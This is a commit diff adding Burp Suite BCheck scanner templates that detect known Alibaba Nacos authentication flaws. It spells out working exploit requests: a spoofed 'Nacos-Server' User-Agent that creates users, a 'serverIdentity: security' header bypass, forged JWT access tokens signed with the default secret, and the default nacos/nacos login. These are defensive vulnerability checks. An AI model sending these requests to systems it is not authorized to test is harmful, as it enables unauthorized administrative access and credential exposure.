Added partial vulnerability in alibaba nacos application. Default password and unauthorized access bypass

other/nacos/Nacos-create-user-unauthorized-bypass.bcheck

@@ -0,0 +1,55 @@
+metadata:
+    language: v1-beta
+    name: "Nacos Unauthorized Create User"
+    description: "https://github.com/alibaba/nacos/issues/4593 "
+    tags: "Unauthorized","Nacos"
+    author: "JaveleyQAQ"
+
+define:
+    user = {random_str(5)}
+    potential_path_1 = `/nacos/v1/auth/users?username={user}&password={user}`
+    potential_path_2 = `/nacos/v1/auth/users?username={user}`
+    potential_path_3 = `/v1/auth/users?username={user}&password={user}`
+    potential_path_4 = `/v1/auth/users?username={user}`
+
+given host then
+    send request called nacos:
+        method: "POST"
+        path: {potential_path_1}
+        headers:
+            "User-Agent": "Nacos-Server"
+    if {nacos.response.status_code} is "200" and "create user ok!" in {nacos.response.body} then
+        send request called nacos_delete_1:
+            method: "DELETE"
+            path: {potential_path_2}
+            headers:
+                "User-Agent": "Nacos-Server"
+        if {nacos_delete_1.response.status_code} is "200" and "delete user ok!" in {nacos_delete_1.response.body} then
+            report issue:
+                severity: high
+                confidence: certain
+                detail: `https://github.com/alibaba/nacos/issues/4593`
+                remediation: `https://github.com/alibaba/nacos/issues/4593`
+        end if
+    else then
+        send request called nacos_2:
+            method: "POST"
+            path: {potential_path_3}
+            headers:
+                "User-Agent": "Nacos-Server"
+        if {nacos_2.response.status_code} is "200" and "create user ok!" in {nacos_2.response.body} then
+            send request called nacos_delete_2:
+                method: "DELETE"
+                path: {potential_path_4}
+                headers:
+                    "User-Agent": "Nacos-Server"
+            if {nacos_delete_2.response.status_code} is "200" and "delete user ok!" in {nacos_delete_2.response.body} then
+                report issue:
+                    severity: high
+                    confidence: certain
+                    detail: `https://github.com/alibaba/nacos/issues/4593`
+                    remediation: `https://github.com/alibaba/nacos/issues/4593`
+            end if
+        end if
+    end if
+

other/nacos/Nacos-default-password.bcheck

@@ -0,0 +1,30 @@
+metadata:
+    language: v1-beta
+    name: "Nacos default password"
+    description: "Nacos Default Password"
+    tags: "Unauthorized","Nacos","DefaultPassword"
+    author: "JaveleyQAQ"
+
+define:
+    data = "username=nacos&password=nacos"
+
+run for each:
+    nacos_detect = 
+        "/nacos/v1/auth/users/login",
+        "/v1/auth/users/login"
+
+given host then
+    send request called nacos:
+        method: "POST"
+        path: {nacos_detect}
+        headers:
+            "Content-Type": "application/x-www-form-urlencoded"
+        appending body: {data}
+    if {nacos.response.status_code} is "200" and "\"accessToken\":" in {nacos.response.body} and "Authorization" in {nacos.response.headers} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: `Nacos Default User: nacos/nacos`
+            remediation: "Change your password"
+    end if
+

other/nacos/Nacos-severidentity-bypass.bcheck

@@ -0,0 +1,27 @@
+metadata:
+    language: v1-beta
+    name: "Nacos ServerIdentity Bypass"
+    description: "Nacos <= 2.2.0 - ServerIdentity Bypass"
+    tags: "Unauthorized","Nacos"
+    author: "JaveleyQAQ"
+
+run for each:
+    nacos_detect = 
+        "/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=",
+        "/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken="
+
+given host then
+    send request called nacos:
+        method: "GET"
+        path: {nacos_detect}
+        appending headers:
+            "serverIdentity": "security"
+
+    if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: `Nacos <= 2.2.0 platform adds "serverIdentity: security" to the header to bypass authentication and view the list of users. \nhttps://github.com/MrWQ/vulnerability-paper/blob/55e4dca8b537b93c6b90008af2f7eddd68271f2c/bugs/%E9%82%A3%E4%BA%9B%E5%B9%B4%E6%88%91%E4%BB%AC%E4%B8%80%E8%B5%B7%E8%BF%BD%E8%BF%87%E7%9A%84%20Nacos.md`
+            remediation: `Change the default value of token.secret.key in the application.properties file. Refer to https://nacos.io/zh-cn/docs/v2/guide/user/auth.html`
+    end if
+

other/nacos/Nacos-user-list-unauthorized-bypass.bcheck

@@ -0,0 +1,29 @@
+metadata:
+    language: v1-beta
+    name: "Nacos User List Unauthorized Bypass"
+    description: "Nacos < 2.2.0 - Authentication Bypass CVE-2021-29441."
+    tags: "Unauthorized","Nacos"
+    author: "JaveleyQAQ"
+
+run for each:
+    nacos_detect =
+        `/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g`,
+        `/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDUwNDAxOX0.vW8mpBNoJ7hVKPNhEtQl4Z5b00G4P9Ktrn_7c58crOk`,
+        `/v1/auth/users?pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g`,
+        `/v1/auth/users?pageNo=1&pageSize=10&accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTcxMDUwNDAxOX0.vW8mpBNoJ7hVKPNhEtQl4Z5b00G4P9Ktrn_7c58crOk`
+
+given host then
+    send request called nacos:
+        method: "GET"
+        path: {nacos_detect}
+    if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: `The authentication function of Nacos can be bypassed through the default JWT secret. Nacos < 2.2.0 - Authentication Bypass CVE-2021-29441`
+            remediation: "
+                - https://github.com/alibaba/nacos/issues/10060
+                - https://avd.aliyun.com/detail?id=AVD-2023-1655789
+                - https://nacos.io/zh-cn/docs/auth.html"
+    end if
+

other/nacos/Nacos-user-list-unauthorized.bcheck

@@ -0,0 +1,26 @@
+metadata:
+    language: v1-beta
+    name: "Nacos User List Unauthorized"
+    description: "Alibaba Nacos V1 Auth Bypass. CVE-2021-29441"
+    tags: "Unauthorized","Nacos"
+    author: "JaveleyQAQ"
+
+run for each:
+    nacos_detect =
+        "/nacos/v1/auth/users?pageNo=1&pageSize=9",
+        "/v1/auth/users?pageNo=1&pageSize=9"
+
+given host then
+    send request called nacos:
+        method: "GET"
+        path: {nacos_detect}
+
+    if {nacos.response.status_code} is "200" and "application/json" in {nacos.response.headers} and "\"username\":" in {nacos.response.body} and "\"password\":" in {nacos.response.body} then
+        report issue:
+            severity: high
+            confidence: certain
+            detail: `Nacos is a platform designed for dynamic service discovery and configuration and service management. In Nacos before version 1.4.1, when configured to use authentication (-Dnacos.core.auth.enabled=true), Nacos uses the AuthFilter servlet filter to enforce authentication. This filter has a backdoor that enables Nacos servers to bypass this filter and therefore skip authentication checks. This mechanism relies on the user-agent HTTP header, so it can be easily spoofed. This is										sue may allow any user to carry out any administrative tasks on the Nacos server.`
+            remediation: "https://github.com/alibaba/nacos/pull/4703.
+                          \n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29441"
+    end if
+